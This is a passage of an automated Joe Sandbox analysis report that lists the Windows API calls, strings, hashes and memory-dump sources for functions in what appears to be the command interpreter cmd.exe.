                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A6A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 513048808-0
                                                                                        • Opcode ID: b5815246b5fe8489ced29e14313fc7691f2ccc9492bcc2be1b7c96c44f0ecf58
                                                                                        • Instruction ID: 5117cdecaf7cca54a353682747b780bdef984381b56527736a91cc02395a720f
                                                                                        • Opcode Fuzzy Hash: b5815246b5fe8489ced29e14313fc7691f2ccc9492bcc2be1b7c96c44f0ecf58
                                                                                        • Instruction Fuzzy Hash: D10186378042606B862157FC9D5D97ABBECE687734B290325F876D22D4DA74CD02D1B2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • memset.MSVCRT ref: 00D7D954
                                                                                        • longjmp.MSVCRT(00DA0A70,000000FF,00000000,00D925C2,00D925C0,?,?,?,?,00D6D980), ref: 00D7D96D
                                                                                        • memcpy.MSVCRT ref: 00D7D987
                                                                                        • longjmp.MSVCRT(00DA0A70,000000FF,00D925C2,00D925C0,?,?,?,?,00D6D980), ref: 00D7D9D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                                                                        • String ID: 0123456789
                                                                                        • API String ID: 2034586978-2793719750
                                                                                        • Opcode ID: 9f44b17241b9059bdf12884135d512785306a887e5e5329e0e288287faaf9302
                                                                                        • Instruction ID: f3d6cc7a5962700180832149134e1eace986619479b3c3a8a8450448a5214d61
                                                                                        • Opcode Fuzzy Hash: 9f44b17241b9059bdf12884135d512785306a887e5e5329e0e288287faaf9302
                                                                                        • Instruction Fuzzy Hash: 1B712035F043069BDB24AF68AC4567A77B2EF84300F29816AE945D7384EB75DD06CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D65074
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D6515F
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                        • iswspace.MSVCRT ref: 00D79289
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$iswspacememset
                                                                                        • String ID: %s
                                                                                        • API String ID: 2220997661-3043279178
                                                                                        • Opcode ID: edbea384e003fa9f2ef166c7dcd99f912df3d02ab294bfa0aa970dc5a9fb86e3
                                                                                        • Instruction ID: 6e19cc9d5fd0b6ed280613404cf58b435023039c0119df049dd990035b92147e
                                                                                        • Opcode Fuzzy Hash: edbea384e003fa9f2ef166c7dcd99f912df3d02ab294bfa0aa970dc5a9fb86e3
                                                                                        • Instruction Fuzzy Hash: 2951D472A006169BCB24DBA89C5267AB3F5EF59310F18455EE849D7340FB34DD81CBB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00D87121
                                                                                        • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00D87197
                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00D871FF
                                                                                        Strings
                                                                                        • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 00D870EE
                                                                                        • %WINDOWS_COPYRIGHT%, xrefs: 00D87107
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                        • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                                        • API String ID: 1103618819-4062316587
                                                                                        • Opcode ID: 4bab082ff6ddf76507f45309ea443973d37fbff46d4e7a22e6f455edba3a0290
                                                                                        • Instruction ID: 59f0ee130a62eb0625b76846a2b81d80d4777606d990cd02915c5f79530d31c8
                                                                                        • Opcode Fuzzy Hash: 4bab082ff6ddf76507f45309ea443973d37fbff46d4e7a22e6f455edba3a0290
                                                                                        • Instruction Fuzzy Hash: A641D335B003158BCB20EBA888547BA73A1FF88744F790469E946EB750EA65DE42C370
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 00D82652
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D82670
                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D82694
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CreateSemaphore
                                                                                        • String ID: _p0$wil
                                                                                        • API String ID: 4049970386-1814513734
                                                                                        • Opcode ID: 33d55f722921a0fcdc277699f348e0e0bd562260590490f1f310c5a8bd8369ef
                                                                                        • Instruction ID: 8eea5c781f846d568b1774d5e25f8abff6cd5ec1442c8386c4dc72236643c6a8
                                                                                        • Opcode Fuzzy Hash: 33d55f722921a0fcdc277699f348e0e0bd562260590490f1f310c5a8bd8369ef
                                                                                        • Instruction Fuzzy Hash: 8F31A475A402198BCB25FF28CD9AABA73B5EF95710F1941A8E816D7350EA70DE40CB70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _wcsnicmp.MSVCRT ref: 00D85295
                                                                                          • Part of subcall function 00D7727B: __iob_func.MSVCRT ref: 00D77280
                                                                                        • fprintf.MSVCRT ref: 00D85215
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: __iob_func_wcsnicmpfprintf
                                                                                        • String ID: CMD Internal Error %s$%s$Null environment
                                                                                        • API String ID: 1828771275-2781220306
                                                                                        • Opcode ID: 25ba573de7bf31a97a01e8521d7faa100340409380b586590aa54a0b44f930df
                                                                                        • Instruction ID: 9fd0f2f3021e210dbffd06303e3f946b09ec29f23a7705301cfb8f227194e445
                                                                                        • Opcode Fuzzy Hash: 25ba573de7bf31a97a01e8521d7faa100340409380b586590aa54a0b44f930df
                                                                                        • Instruction Fuzzy Hash: 3B312936E00615DBCF28BB68AC45B6EB761EF58700B190529EC0AA3245EE705E01C779
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D6AB7F: iswspace.MSVCRT ref: 00D6AB8D
                                                                                          • Part of subcall function 00D6AB7F: wcschr.MSVCRT ref: 00D6AB9E
                                                                                        • wcschr.MSVCRT ref: 00D6B3FC
                                                                                        • wcschr.MSVCRT ref: 00D6B40E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$iswspace
                                                                                        • String ID: &<|>$+: $=,;
                                                                                        • API String ID: 3458554142-2256444845
                                                                                        • Opcode ID: 2ef3759c1e2d0c9be59de56c2458bd31d5b73688e0a369eaf6bd454bff2ba1b7
                                                                                        • Instruction ID: eacd7964011a67f52b33995c55472ca883c93dc2c21ce9ea1f16e92254289306
                                                                                        • Opcode Fuzzy Hash: 2ef3759c1e2d0c9be59de56c2458bd31d5b73688e0a369eaf6bd454bff2ba1b7
                                                                                        • Instruction Fuzzy Hash: EB11E472A00155ABC7349B6AC45157AB7E6EFB6768B2D402BE8C4D7380FB319D81D331
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00D64D66
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00D64D8A
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D64D95
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00D64D5C
                                                                                        • UBR, xrefs: 00D64D82
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                        • API String ID: 3677997916-3870813718
                                                                                        • Opcode ID: 747a524e32a5bdb6e1f684806e6823ce4f69aba43cf8e8c09abe793577c18eed
                                                                                        • Instruction ID: 7e59fd44ca6b70716548a547ca774f83781b49139d4e5b190aae8852f1796395
                                                                                        • Opcode Fuzzy Hash: 747a524e32a5bdb6e1f684806e6823ce4f69aba43cf8e8c09abe793577c18eed
                                                                                        • Instruction Fuzzy Hash: B1013C76E40218BBDB21DB98DC49FEEBBB8EB84750F140166FA02F2180D3709A51DA64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,00D6B952), ref: 00D6E2D9
                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,00000000,00D6B952), ref: 00D6E2F9
                                                                                        • SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,00D6B952), ref: 00D7DC08
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleLocaleModuleProcThread
                                                                                        • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                        • API String ID: 886074793-2530943252
                                                                                        • Opcode ID: 3d3007c6b535fcaffa9d5257a09a6eac07266c156eb50e0b78f3b591bc31aa1f
                                                                                        • Instruction ID: b74a7af1183024c6ca1088ac26aba832d5d6fb95d4d817a6a074beefd936c285
                                                                                        • Opcode Fuzzy Hash: 3d3007c6b535fcaffa9d5257a09a6eac07266c156eb50e0b78f3b591bc31aa1f
                                                                                        • Instruction Fuzzy Hash: 35F09A35A00720ABCA105B28FD08A693764EB09B71B290301F815E33E0C7A09C01DBB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D6FD3A
                                                                                        • wcsspn.MSVCRT ref: 00D6FF18
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D7000F
                                                                                          • Part of subcall function 00D71CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D3A
                                                                                          • Part of subcall function 00D71CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D44
                                                                                          • Part of subcall function 00D71CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D57
                                                                                          • Part of subcall function 00D71CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D61
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                                        • String ID:
                                                                                        • API String ID: 1535828850-0
                                                                                        • Opcode ID: ecbbaa61b05a459484c848fa0d669e0eb93ef7dcf9c1cd2d62a5347be2c41b2e
                                                                                        • Instruction ID: 3a7ebc5fb5877230e628cec616402ccdb5bb3733804ad607ca30fa882cbfc017
                                                                                        • Opcode Fuzzy Hash: ecbbaa61b05a459484c848fa0d669e0eb93ef7dcf9c1cd2d62a5347be2c41b2e
                                                                                        • Instruction Fuzzy Hash: 76C16075900215CFCB64DF18D890BA9B7B6FF49314F5881AEE44A97391EB309D81CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_setjmp3
                                                                                        • String ID:
                                                                                        • API String ID: 4215035025-0
                                                                                        • Opcode ID: 983b27bd00970b732d1fcd786aec419d6b2e53707c2beff199d5f8761f55a545
                                                                                        • Instruction ID: bf0f544fb6a3eade2bfc907f708badbc6eaccc3c9d46bc4b1ef4f79ce10e733e
                                                                                        • Opcode Fuzzy Hash: 983b27bd00970b732d1fcd786aec419d6b2e53707c2beff199d5f8761f55a545
                                                                                        • Instruction Fuzzy Hash: 87517471E013299BCB20CBA5ECA4AEEBB74FB44740F144199E509E3244EB349E84CF75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_wcsicmp
                                                                                        • String ID:
                                                                                        • API String ID: 1670951261-0
                                                                                        • Opcode ID: dd70ff46b39897140c97c7396b5fa589fb035fc2b2ca193c171d5def2219e0d8
                                                                                        • Instruction ID: 74c5106022074e90d5f1f1a2a520de6dc2aa50e1a94daae267bf5f1eeb64ad2a
                                                                                        • Opcode Fuzzy Hash: dd70ff46b39897140c97c7396b5fa589fb035fc2b2ca193c171d5def2219e0d8
                                                                                        • Instruction Fuzzy Hash: 5E417171A102195BDF24DAA5DC95BAEF7B8EF44344F0801A9E545E3241EB34DE84CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D89527
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D8952F
                                                                                        • _get_osfhandle.MSVCRT ref: 00D895B5
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D895BD
                                                                                          • Part of subcall function 00D88C50: longjmp.MSVCRT(00DA0A70,00000001,00D6206C,00D65E68,?,?,?,?,00000000), ref: 00D88CC4
                                                                                          • Part of subcall function 00D88C50: memset.MSVCRT ref: 00D88D1D
                                                                                          • Part of subcall function 00D88C50: memset.MSVCRT ref: 00D88D45
                                                                                          • Part of subcall function 00D88C50: memset.MSVCRT ref: 00D88D6D
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D895CC
                                                                                          • Part of subcall function 00D6A16C: _close.MSVCRT ref: 00D6A19B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                                                                        • String ID:
                                                                                        • API String ID: 288106245-0
                                                                                        • Opcode ID: 148eb5df26299d65558698bde5b2cb71eaa1d11b2989327d107cbebfd0e1b0b0
                                                                                        • Instruction ID: 6de4daeb5071b8727c2814795a441190040279b8f5f0502051775e2626beadc8
                                                                                        • Opcode Fuzzy Hash: 148eb5df26299d65558698bde5b2cb71eaa1d11b2989327d107cbebfd0e1b0b0
                                                                                        • Instruction Fuzzy Hash: E731B371A00204AFEF19EF74D859BBEB769EB85310F288169F542D6284DB74DD418B70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00D71775,-00000001,-00000001,-00000001,-00000001), ref: 00D72650
                                                                                        • _get_osfhandle.MSVCRT ref: 00D7F339
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00D71775,-00000001,-00000001,-00000001,-00000001), ref: 00D7F347
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,?,00000104,00000000,?,?,00D71775,-00000001,-00000001,-00000001,-00000001), ref: 00D7F383
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00D787F0,?,?,?,00D787F0,00000000,?,00D64A0A), ref: 00D7F390
                                                                                          • Part of subcall function 00D6DD98: _get_osfhandle.MSVCRT ref: 00D6DDA3
                                                                                          • Part of subcall function 00D6DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D7C050), ref: 00D6DDAD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: BufferConsoleInfoScreen$Heap_get_osfhandle$AllocFileProcessTypelongjmp
                                                                                        • String ID:
                                                                                        • API String ID: 158340877-0
                                                                                        • Opcode ID: d3bd5b6ccb0865a9d8787e9447bfa2057da86329567fbae5501f89fb0cb995ba
                                                                                        • Instruction ID: 8aeb415171f1bc0016155474c2d9d09cb283f7fbfb412030bde6650ae45557d5
                                                                                        • Opcode Fuzzy Hash: d3bd5b6ccb0865a9d8787e9447bfa2057da86329567fbae5501f89fb0cb995ba
                                                                                        • Instruction Fuzzy Hash: 04317C71A103059FD724AF79D885A7EB7F8EF48B16B14852EE88AC2250FB74D805CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D74CC2
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D88FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00D74CCA
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D80BFC
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D80C48
                                                                                        • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D80C71
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 3588551418-0
                                                                                        • Opcode ID: 1c0532200d508ed7cc5989cd96ccf3f92d6d4be1d1967074d42c6ab711eb838f
                                                                                        • Instruction ID: b76653f8e6f167fc43e1661fdb82d203fd0233c0d4fd62b6e057ceb6225e77af
                                                                                        • Opcode Fuzzy Hash: 1c0532200d508ed7cc5989cd96ccf3f92d6d4be1d1967074d42c6ab711eb838f
                                                                                        • Instruction Fuzzy Hash: A831BF71600205AFEB29AF68D845A7F7B6AEF85304B24852AF846D7250EB34DC40DB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6E29B
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D6E2A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
